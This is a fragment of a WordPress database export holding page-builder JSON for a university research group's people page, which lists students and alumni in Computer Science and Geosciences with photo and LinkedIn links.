,\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-1663377340901.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1657,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c68\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c67\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c140\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c140\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c145\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c145\",\"index\":2,\"id\":\"182-c148\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c145\",\"index\":1,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c150\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Raiyan\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c150\",\"index\":2,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c150\",\"index\":1,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c144\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c143\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c155\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c155\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c160\",\"index\":2,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c160\",\"index\":1,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c165\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c165\",\"index\":2,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c165\",\"index\":1,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c175\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c175\",\"index\":2,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c175\",\"index\":1,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c180\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c180\",\"index\":2,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c180\",\"index\":1,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c185\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c185\",\"index\":2,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c185\",\"index\":1,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c190\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c190\",\"index\":2,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c190\",\"index\":1,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c199\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c199\",\"index\":2,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c199\",\"index\":1,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c204\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c205\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c204\",\"index\":2,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c204\",\"index\":1,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c158\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c211\",\"parentId\":\"182-c210\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c210\",\"parentId\":\"182-c209\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c209\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-13 09:59:38','2023-10-13 13:59:38','',562,'https://gsudice.dataconn.net/?p=1727',0,'revision','',0),(1728,1,'2023-10-13 09:59:38','2023-10-13 13:59:38','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c64\" 